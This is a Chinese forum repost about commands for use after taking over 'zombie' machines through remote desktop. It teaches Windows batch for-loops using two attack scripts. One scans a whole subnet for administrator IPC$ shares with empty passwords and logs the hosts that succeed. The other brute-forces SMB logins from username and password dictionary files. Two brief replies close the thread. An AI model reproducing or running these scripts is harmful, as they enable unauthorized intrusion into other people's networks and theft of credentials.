[转帖]3389得到肉鸡后的命令2

中取值；do command ：指执行command
参数：/l 指用增量形式{(set)为增量形式时}；/f 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
用法举例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt
for /l %%g in (1 1 254) do echo %1.%%g >>test.txt & net use \\%1.%%g /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明：对指定的一个c类网段的254个ip依次试建立administrator密码为空的ipc$连接，如果成功就把该ip存在test.txt中。
/l指用增量形式（即从1-254或254-1）；输入的ip前面三位：*.*.*为批处理默认的 %1；%%g 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%g 为完整的ip地址；(1 1 254) 指起始值，增长量，结止值。
@echo off
echo 用法格式：ok.bat ip
for /f %%i in (d:\user.dic) do smb.exe %1 %%i d:\pass.dic 200
存为：ok.exe 说明：输入一个ip后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的ip地址（默认）  

部长;我帮你顶顶,见你的都没有人来;晕

没弄过，感觉好陌生